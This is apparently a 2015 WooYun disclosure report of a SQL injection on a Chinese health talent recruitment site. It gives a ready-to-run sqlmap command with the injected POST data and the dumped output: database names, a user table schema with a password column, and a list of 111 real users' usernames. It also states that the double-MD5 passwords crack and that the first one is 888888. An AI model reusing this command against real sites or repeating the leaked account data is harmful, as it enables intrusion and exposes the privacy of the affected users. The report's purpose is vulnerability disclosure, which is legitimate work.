乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-27: 细节已通知厂商并且等待厂商处理中 2015-08-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-09: 细节向核心白帽子及相关领域专家公开 2015-09-19: 细节向普通白帽子公开 2015-09-29: 细节向实习白帽子公开 2015-10-14: 细节向公众公开
中国卫生人才网某处POST注入野生一只
注入命令:sqlmap.py -u "http://**.**.**.**/rcjl/outersearchPositionAction.do" --data "radiobutton=radiobutton1&image=88952634&image=%EF%BF%BD%DF%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&select=88952634&select2=88952634&select3=88952634&dwmc=--%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%B5%A5%CE%BB%2F%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD--" --dbs
跑出数据库内容
脱点数据证明危害,user太多,跑一点点我就中断了
available databases [9]:[*] CTXSYS[*] EXFSYS[*] MDSYS[*] NEWTES[*] OLAPSYS[*] SYS[*] SYSTEM[*] UNIPORTAL[*] WMSYSDatabase: UNIPORTAL[1 table]+---------+| UP_USER |+---------+Database: UNIPORTALTable: UP_USER[5 columns]+--------------------+----------+| Column | Type |+--------------------+----------+| UPUS_EMAIL | VARCHAR2 || UPUS_ID | VARCHAR2 || UPUS_NAME | VARCHAR2 || UPUS_PASSWORD | VARCHAR2 || UPUS_REGISTER_TIME | DATE |+--------------------+----------+Database: UNIPORTALTable: UP_USER[111 entries]+---------------------+| UPUS_NAME |+---------------------+| youxiuzheng1 || zhanghaishan || jiangyang0123 || wangbashabi || ysy2006 || Huangjun || aaaa11 || sweetdot6 || tanyanping || ljf6898 || zhlili || zhangchunmei16 || rihua || ganhuanji || huangyien || tqtsxfsrm || lianmin7097@**.**.**.** || liushuwen || sansanaa || lijine || Luxiaoling || liu991150308 || B19721103 || abob || yuanzhongfeng690407 || pengjh2 || hn90 || wwww || moliping101 || gejuan || liujiaying1234 || fangfangchen || tqtscfsrm || zhouning || niuxiaoqian6 || lydia_han || LiXiangLian || lijianlan8507 || zhangyuru || cuiping || lianggueizhen || chenguoxue888 || aammpp || weiminlin || piyumei || chenminfeng || liangxia123 || qinaiping || linju1234 || hawkli7743 || yangchuanli || shihong1 || linguifen || poiuytrewq5602437 || liufeng_hua || yangxiaojuan2000 || qyxh || thxzyyb || lyf80 || hujingxian || chuwenwen1 || yinxiaochun || xiaocao520 || weibijing || zhangxiao2 || B2588 || liangguang || wuqianqian8566 || dongxue || caiyuemin || lialong || hlj_lxm808 || zhongxiuyan || gmrmyydyf || cuihaijie || maiyumei || liufang995 || ningtang2 || wdzgxujing || wyp3151953 || yiyanhua || Tangchunyan || xcjwlj || yetianliu || xuchenhong || wangynyan || www6676 || bingxueqingzi || kpxjxxjie || huangxiaoying || zhaoyufei || charly || LL0206 || lianghaimei || liuxiaohua0 || hebqiji || zengxiaoyi || pby001 || zhandan || jiaxing_680 || yangni || sunli608 || songxiaojie || sssdxl || yanyanli_6 || yuannana || gumujie || lifang0918 || shengminghua || yulili || mugua |+---------------------+
密码是二次加密的MD5密码,解密两次才能解密出来,第一条密码最终是888888
综上
你们懂
危害等级:中
漏洞Rank:10
确认时间:2015-08-30 02:22
CNVD确认并复现所述情况,已经由CNVD向网站运维人员直接通报.
暂无